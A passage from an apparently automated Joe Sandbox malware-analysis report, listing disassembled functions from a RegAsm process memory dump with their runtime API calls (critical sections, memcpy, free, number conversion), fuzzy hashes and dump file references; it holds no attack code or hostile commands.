                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                            • String ID:
                                                                            • API String ID: 3725304770-0
                                                                            • Opcode ID: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                            • Instruction ID: d1815c987ecd806101ffba3002799b50403689a775dde8e368535f40b8862961
                                                                            • Opcode Fuzzy Hash: 2d7263d7b430020b566c70d1ccaee9983a2c6cb00b4793a4f34d58ee3864294d
                                                                            • Instruction Fuzzy Hash: B581B070A112159FCB08CF6CD8949AEBBB1FF89314F04C52CE895AB750E730E864CBA1
                                                                            Function 6CC55C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                            • __aulldiv.LIBCMT ref: 6CC55DB4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC55DED
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                            • String ID:
                                                                            • API String ID: 557828605-0
                                                                            • Opcode ID: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                            • Instruction ID: ca4236de6147bb88d128acd82141a990248519c5041f7350cf996e8fa2e56c25
                                                                            • Opcode Fuzzy Hash: fb93f8d1316a3be3696b68c7e631e39ab7f3b5c78c70a48caf83f2e50a23beb1
                                                                            • Instruction Fuzzy Hash: 2951907AE0011A8FCF08CFACC994AAEBBB1FF85304F19865DD811A7750D731A955CB94
                                                                            Function 6CC97170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTickCount64.KERNEL32 ref: 6CC97250
                                                                            • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC97277
                                                                            • __aulldiv.LIBCMT ref: 6CC972C4
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC972F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                            • String ID:
                                                                            • API String ID: 557828605-0
                                                                            • Opcode ID: 1a6420035a5884c86aa7046053938f155220aa1ccc689d63c4a72ea2b452f717
                                                                            • Instruction ID: 6faf68478f81235f56aabc54f3e674c8ca6dafe71187bc28cd5056258af30321
                                                                            • Opcode Fuzzy Hash: 1a6420035a5884c86aa7046053938f155220aa1ccc689d63c4a72ea2b452f717
                                                                            • Instruction Fuzzy Hash: FF516D79E0112ACFCF08CFA8C895AAEBBB1FB89304F15861DDC15A7750D730A945CB95
                                                                            Function 6CC3CDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3CEBD
                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC3CEF5
                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC3CF4E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: 0
                                                                            • API String ID: 438689982-4108050209
                                                                            • Opcode ID: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                            • Instruction ID: 8ac224a142176f0fe784745d2793a67879c34ea292a3693b6c4ec1a3e5824e3b
                                                                            • Opcode Fuzzy Hash: 346e7f0041a2f42a33e9390969aef2173515be73669baf3dd8def197db56d1dd
                                                                            • Instruction Fuzzy Hash: 90511575A002668FCB00CF19D890A9AB7B5FF99304F19869DD8595F391E731ED06CBE0
                                                                            Function 6CC977D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC977FA
                                                                            • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC97829
                                                                              • Part of subcall function 6CC6CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC331A7), ref: 6CC6CC45
                                                                              • Part of subcall function 6CC6CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC331A7), ref: 6CC6CC4E
                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC9789F
                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC978CF
                                                                              • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                              • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                            • String ID:
                                                                            • API String ID: 2525797420-0
                                                                            • Opcode ID: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                            • Instruction ID: 2dd5b361b5c0cff2c2a0cce4a73f8cb83eafe1ecb128bbca8c71ed04cbe70aca
                                                                            • Opcode Fuzzy Hash: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                            • Instruction Fuzzy Hash: 3A41AD71905B069FD300DF29D48056AFBF4FFCA254F204A2EE4A987740EB31D559CB92
                                                                            Function 6CC8DAE0 Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                            • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                            • free.MOZGLUE(?), ref: 6CC8DC2E
                                                                            • free.MOZGLUE(?), ref: 6CC8DC40
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Impl@detail@mozilla@@Mutexfree
                                                                            • String ID:
                                                                            • API String ID: 3186548839-0
                                                                            • Opcode ID: 6fdd186e3884d1ab83c0a012bda7019ae9325ef52a772a1638255fff18c84ad0
                                                                            • Instruction ID: 2c97abf3ba017b9f81cc225f445f377aa0618614829f0a88ce35b68cef09d54a
                                                                            • Opcode Fuzzy Hash: 6fdd186e3884d1ab83c0a012bda7019ae9325ef52a772a1638255fff18c84ad0
                                                                            • Instruction Fuzzy Hash: 0C4178B56057018FC710CF35C498A6BBBF6BFC8258F55882EE89A87741EB31E845CB51
                                                                            Function 6CC76470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC782BC,?,?), ref: 6CC7649B
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC764A9
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7653F
                                                                            • free.MOZGLUE(?), ref: 6CC7655A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 3596744550-0
                                                                            • Opcode ID: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                            • Instruction ID: 49e8e67bf02723a6240f7e2105daf02e09c3a1f18c1526096c8c75df20cbd06a
                                                                            • Opcode Fuzzy Hash: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                            • Instruction Fuzzy Hash: A3316FB5A047059FD740CF24D884A9ABBF4FF89314F00842EF85A97751EB34E919CB92
                                                                            Function 6CC8A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.MOZGLUE(?), ref: 6CC8A315
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6CC8A31F
                                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CC8A36A
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                              • Part of subcall function 6CC82140: free.MOZGLUE(?,00000060,?,6CC87D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8215D
                                                                            • free.MOZGLUE(00000000), ref: 6CC8A37C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                            • String ID:
                                                                            • API String ID: 700533648-0
                                                                            • Opcode ID: 2e24a3a0c5ecca89d1e7a8372f58d6433107f9482319796e6496eb482cdf98b4
                                                                            • Instruction ID: 57631d54979c05c70f35e463fce654f5f7083325a63d287472994dc2d1a2f87d
                                                                            • Opcode Fuzzy Hash: 2e24a3a0c5ecca89d1e7a8372f58d6433107f9482319796e6496eb482cdf98b4
                                                                            • Instruction Fuzzy Hash: 5721F2B1A026249BCB118F06D844B9FBBB9EF8672CF544015EE099B740EB36ED06C6D5
                                                                            Function 6CC6FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC6FFD3
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC6FFF5
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC7001B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC7002A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 826125452-0
                                                                            • Opcode ID: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                            • Instruction ID: bfafa36b646b16de20d7e3550097c6cee77d6c2926f041836281edc0c978bfff
                                                                            • Opcode Fuzzy Hash: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                            • Instruction Fuzzy Hash: 9D21F4B2A002155FC7189EAD98D48AEB7FAFB853243254738E425D7780FA71AD0286A1
                                                                            Function 6CC97930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC4BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6CC97A3F), ref: 6CC4BF11
                                                                              • Part of subcall function 6CC4BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6CC97A3F), ref: 6CC4BF5D
                                                                              • Part of subcall function 6CC4BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6CC97A3F), ref: 6CC4BF7E
                                                                            • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6CC97968
                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6CC9A264,6CC9A264), ref: 6CC9799A
                                                                              • Part of subcall function 6CC49830: free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6CC979E0
                                                                            • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6CC979E8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                            • String ID:
                                                                            • API String ID: 3421697164-0
                                                                            • Opcode ID: 2355cf0a370bdf432cf809ec85837f114b483b683212884c91689894ccfacba5
                                                                            • Instruction ID: 91ff6c8a2fd40c026cafafc63d6f1410255401fbbd5df6ca6422035774c3ec5d
                                                                            • Opcode Fuzzy Hash: 2355cf0a370bdf432cf809ec85837f114b483b683212884c91689894ccfacba5
                                                                            • Instruction Fuzzy Hash: E3218C357043049FCB04DF68D898A9EBBB5EF89314F00886DE84A87351DB34A90ACB92
                                                                            Function 6CC97A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC4BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6CC97A3F), ref: 6CC4BF11
                                                                              • Part of subcall function 6CC4BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6CC97A3F), ref: 6CC4BF5D
                                                                              • Part of subcall function 6CC4BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6CC97A3F), ref: 6CC4BF7E
                                                                            • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6CC97A48
                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6CC97A7A
                                                                              • Part of subcall function 6CC49830: free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6CC97AC0
                                                                            • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6CC97AC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                            • String ID:
                                                                            • API String ID: 3421697164-0
                                                                            • Opcode ID: 041102d017c6538fbfee5a3f3c5cf63d3acda700d1eb9cc78f67ef5fef963f7f
                                                                            • Instruction ID: f388e2d80a83a34411b7b484af4c7ef0e039979175002b9ff7ed32a0d709380c
                                                                            • Opcode Fuzzy Hash: 041102d017c6538fbfee5a3f3c5cf63d3acda700d1eb9cc78f67ef5fef963f7f
                                                                            • Instruction Fuzzy Hash: 2D215C357043049FCB14DF68D899A9EBBB5FF89314F00886DE84A87355DB34A90ACBD2
                                                                            Function 6CC9AAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC9AAF8
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770,?,6CC5BF9F), ref: 6CC9AB08
                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6CC5BF9F), ref: 6CC9AB39
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770,?,?,?,?,?,?,?,?,6CC5BF9F), ref: 6CC9AB6B
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                            • String ID:
                                                                            • API String ID: 1951318356-0
                                                                            • Opcode ID: 443c8b6f97209cc22acbae879b50530f6db4af344e926753fb19fd387b25534f
                                                                            • Instruction ID: 8c5b8c1ce7bbe55ae1cf3c8242fd5ca4444ca291a93cebb8d8a4fdd5daf6f020
                                                                            • Opcode Fuzzy Hash: 443c8b6f97209cc22acbae879b50530f6db4af344e926753fb19fd387b25534f
                                                                            • Instruction Fuzzy Hash: 301151B5E002499FCF00DFE9D89899FBBB5FF893047040469E545A7701EB34E909CBA5
                                                                            Function 6CC4B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4B4F5
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B502
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B542
                                                                            • free.MOZGLUE(?), ref: 6CC4B578
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                            • Instruction ID: 48c1169dc9ce747b403f9707add61b2856b8b85d96a47c8c9b00becc81d606ce
                                                                            • Opcode Fuzzy Hash: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                            • Instruction Fuzzy Hash: 0A11AC38A04B45CBD7128FA9C410769F3B0FF9A318F10D70AE84952B02FBB4B5D48A94
                                                                            Function 6CC73DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC3F20E,?), ref: 6CC73DF5
                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC3F20E,00000000,?), ref: 6CC73DFC
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC73E06
                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC73E0E
                                                                              • Part of subcall function 6CC6CC00: GetCurrentProcess.KERNEL32(?,?,6CC331A7), ref: 6CC6CC0D
                                                                              • Part of subcall function 6CC6CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC331A7), ref: 6CC6CC16
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
